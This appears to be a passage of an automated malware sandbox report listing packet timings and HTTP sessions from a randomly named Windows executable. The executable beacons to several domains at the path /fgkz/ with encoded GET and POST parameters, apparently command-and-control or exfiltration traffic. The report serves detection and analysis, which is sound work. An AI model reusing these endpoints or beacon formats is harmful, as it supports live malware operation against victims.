                                Aug 30, 2024 07:21:30.158576012 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.667834997 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.667857885 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.667869091 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.667881012 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.667891979 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.667901993 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.667915106 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.668098927 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:30.668098927 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:30.668118954 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.668128967 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.668138981 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.668175936 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:30.670548916 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:30.672981977 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.673026085 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.673573017 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:30.685069084 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.685095072 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.685538054 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:30.756160021 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.756181955 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.756198883 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.756213903 CEST8049752216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:30.756516933 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:31.663757086 CEST4975280192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:32.679547071 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:32.684427023 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:32.687649965 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:32.691554070 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:32.696432114 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:32.696501017 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213637114 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213727951 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213763952 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213794947 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213829041 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213844061 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:33.213861942 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213895082 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213907003 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:33.213926077 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213958025 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:33.213959932 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213993073 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.213995934 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:33.214087009 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:33.218919992 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.230618954 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.230648041 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.231627941 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:33.503854036 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.503876925 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.503894091 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.503906965 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.503921986 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.503933907 CEST8049753216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:33.504054070 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:33.504054070 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:34.195107937 CEST4975380192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.210738897 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.217209101 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.219666004 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.223557949 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.228458881 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.711985111 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712038040 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712073088 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712119102 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712131977 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.712152004 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712182999 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712208033 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.712217093 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712318897 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.712516069 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.717292070 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:40.779577017 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:40.786710024 CEST8049755212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:40.791929007 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:40.791929007 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:40.796828032 CEST8049755212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:41.502012968 CEST8049755212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:41.502799988 CEST8049755212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:41.502866983 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:42.304265022 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:43.321597099 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:43.326787949 CEST8049756212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:43.329904079 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:43.333590031 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:43.338690996 CEST8049756212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:43.937447071 CEST8049756212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:43.938206911 CEST8049756212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:43.938263893 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:44.836118937 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:45.851715088 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:45.856676102 CEST8049757212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:45.856753111 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:45.857043028 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:45.861799002 CEST8049757212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:45.861959934 CEST8049757212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:47.366765976 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:47.439721107 CEST8049757212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:47.443640947 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:48.383078098 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:48.389827967 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:48.389898062 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:48.390089035 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:48.396995068 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:52.388220072 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:52.389616966 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:52.389719009 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:52.389780998 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:52.394629955 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:58.135881901 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:21:58.141015053 CEST8049759167.172.228.26192.168.2.5
                                Aug 30, 2024 07:21:58.141109943 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:21:58.141253948 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:21:58.146099091 CEST8049759167.172.228.26192.168.2.5
                                Aug 30, 2024 07:21:58.802145958 CEST8049759167.172.228.26192.168.2.5
                                Aug 30, 2024 07:21:58.802237034 CEST8049759167.172.228.26192.168.2.5
                                Aug 30, 2024 07:21:58.807667017 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:21:59.648094893 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:00.667676926 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:00.672709942 CEST8049760167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:00.675838947 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:00.675838947 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:00.680722952 CEST8049760167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:01.309004068 CEST8049760167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:01.309098005 CEST8049760167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:01.311655045 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:02.539855003 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:03.554476023 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:03.559452057 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:03.559539080 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:03.559797049 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:03.564954996 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:03.565012932 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:04.226394892 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:04.226558924 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:04.226609945 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:05.071573973 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:06.445044041 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:06.449958086 CEST8049762167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:06.450037956 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:06.450171947 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:06.454884052 CEST8049762167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:07.118612051 CEST8049762167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:07.118645906 CEST8049762167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:07.118884087 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:07.118884087 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:07.123693943 CEST8049762167.172.228.26192.168.2.5
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.5 | 49717 | 91.195.240.19 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:18:34.776391029 CEST | 353 | OUT | GET /fgkz/?4f2t8=qUFBQvWBSx+bgMqyDmLQ5iNb4eTiibWqPMlygN/fc4+dM2Q0fApyvpqDNInFWFQ7PUEWbfd7zdq6gjmLUkGdSLdX5yRbFI8ZXQ==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.pheonix-travels.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:18:35.434683084 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.5 | 49718 | 167.172.228.26 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:18:51.223649025 CEST | 633 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nexgen-gaming.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nexgen-gaming.com
                                Referer: http://www.nexgen-gaming.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=G375BnSlYdYzWbbs7NH4CfMk6lu/M+V0Tuan3I1TlozLfce0YubXjlCqbvV1dodxYDtb++7V+xDf2jkB3/DXZxy/d33+O5xXsdmCKil8i2nq3I2u4ZlROnuAFi16fF165KVXcXshzi3ObOYLlvRIWcvKiSkHpUO+7/gtACRqutalQrVu0w==
                                Aug 30, 2024 07:18:51.909374952 CEST | 154 | IN | HTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:18:51 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.nexgen-gaming.com


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.5 | 49719 | 167.172.228.26 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:18:53.749242067 CEST | 653 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nexgen-gaming.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nexgen-gaming.com
                                Referer: http://www.nexgen-gaming.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=G375BnSlYdYzEoTs0K74E/Mnm1u/e+VwTuWn3IdDkbHLe9u0ZvbXmlCqD/VweYc9YCR9+8vV+xXf2jUBwODWYhy9In38QJxXsdmCKiYZi2/q25Gu/IlWRXuDAi16bF1+5KVlcXcYzgPObOoLk+RLZcvQmSlOnW/71cMvLxdr7PnFR+59zAr43hNKyt+hbG5wiZdjsp0=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.5 | 49721 | 167.172.228.26 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:18:56.278666973 CEST | 1666 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nexgen-gaming.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nexgen-gaming.com
                                Referer: http://www.nexgen-gaming.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.5 | 49722 | 167.172.228.26 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:18:59.157587051 CEST | 351 | OUT | GET /fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ== HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.nexgen-gaming.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:18:59.864928961 CEST | 154 | IN | HTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:18:59 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.nexgen-gaming.com


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.5 | 49723 | 52.9.242.57 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:04.908191919 CEST | 642 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.theranchobizarro.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.theranchobizarro.com
                                Referer: http://www.theranchobizarro.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=mwWibasMPq2kMQyEbEVrfzksA5/WlQ3+W5Wc6YMgcgjRbTVd2upBLpcUvxgir6bJYqZa3D+OQJ+hUfIaHHm9mjtBG5FXfpncRV44qI87rspODnBZf/XY1cM5/xEvEFE1IGeo1t4tLF7L0NOZYv042fy8nIUEig1DyOx04k6e85DxhfqUFQ==
                                Aug 30, 2024 07:19:05.516459942 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.13.3
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: no-cache, private
                                date: Fri, 30 Aug 2024 05:19:05 GMT
                                Content-Encoding: gzip


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                6 | 192.168.2.5 | 49724 | 52.9.242.57 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:07.446475029 CEST | 662 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.theranchobizarro.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.theranchobizarro.com
                                Referer: http://www.theranchobizarro.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=mwWibasMPq2kMwCEZlVrYTkvMZ/Wuw25W5ac6ah4cSHRbx9d4MBBOpcU3BgdlabCYqF83DyOQNehUfYaHQy8nztDfpFVbpncRV44qIpsrtBOEUZZdeXb78M63REvOlExIGee1s0HLA/L0N+ZYdM54fy+qoVwtksw5Ms5/Uf6rpqzpqGHCo7Lf4zbH44HkLnxKWN1Y2E=
                                Aug 30, 2024 07:19:08.076946020 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.13.3
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: no-cache, private
                                date: Fri, 30 Aug 2024 05:19:07 GMT
                                Content-Encoding: gzip


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                7 | 192.168.2.5 | 49725 | 52.9.242.57 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:09.985129118 CEST | 1675 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.theranchobizarro.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.theranchobizarro.com
                                Referer: http://www.theranchobizarro.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:19:10.579782009 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.13.3
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: no-cache, private
                                date: Fri, 30 Aug 2024 05:19:10 GMT
                                Content-Encoding: gzip


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                8 | 192.168.2.5 | 49726 | 52.9.242.57 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:19:12.515137911 CEST | 354 | OUT | GET /fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.theranchobizarro.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:19:13.142031908 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.13.3
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: no-cache, private
                                date: Fri, 30 Aug 2024 05:19:13 GMT
                                Data Raw: 31 66 37 30 0d 0a 3c 21 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 20 4c 69 73 74 69 6e 67 5a 65 6e 20 56 65 72 73 69 6f 6e 3a 20 34 2e 32 2e 32 0a 20 20 41 75 74 68 6f 72 3a 20 41 72 74 75 72 20 47 72 69 67 69 6f 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 [TRUNCATED]
                                Data Ascii: 1f70...================================================================================ ListingZen Version: 4.2.2 Author: Artur Grigio================================================================================ --><!DOCTYPE html><html><head lang="en"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="msapplication-tap-highlight" content="no"> <title>Real Estate Property Web Site, MLS Tour, Photography, Video</title><meta name="description" content="Built for agents and photographers, marketers, and other vendors to meet up and create property sites. We provide Photography, Floor Plan, Videography, SEO..."><meta name="keywords" content="real, estate, property, photography, marketing, real estate, zillow, websites, agent, agency, photographer"><meta name="pin
                                Aug 30, 2024 07:19:13.142117977 CEST224INData Raw: 74 65 72 65 73 74 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 75 6b 2e 70 69 6e 74 65 72 65 73 74 2e 63 6f 6d 2f 6c 69 73 74 69 6e 67 7a 65 6e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c
                                Data Ascii: terest" content="https://uk.pinterest.com/listingzen"> <meta property="og:title" content="Real Estate Property Web Site, MLS Tour, Photography, Video" /><meta property="og:description" content="Built for agents and phot
                                Aug 30, 2024 07:19:13.142363071 CEST | 1236 | IN
                                Data Ascii: ographers, marketers, and other vendors to meet up and create property sites. We provide Photography, Floor Plan, Videography, SEO..." /><meta property="og:url" content="1" /><meta property="og:site_name" content="ListingZen" /> <meta n
                                Aug 30, 2024 07:19:13.142474890 CEST | 1236 | IN
                                Data Ascii: ttp://schema.org", "@type": "Organization", "address": "87 N. Raymond Ave., UNIT 809, Pasadena, CA 91103", "url": "https://www.listingzen.com/", "logo": "http://www.theranchobizarro.com/img/site/dark_logo_250.jp
                                Aug 30, 2024 07:19:13.142488956 CEST | 1236 | IN
                                Data Ascii: eaServed": "US" }] } </script> ... Tracking --> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.get
                                Aug 30, 2024 07:19:13.142501116 CEST | 1236 | IN
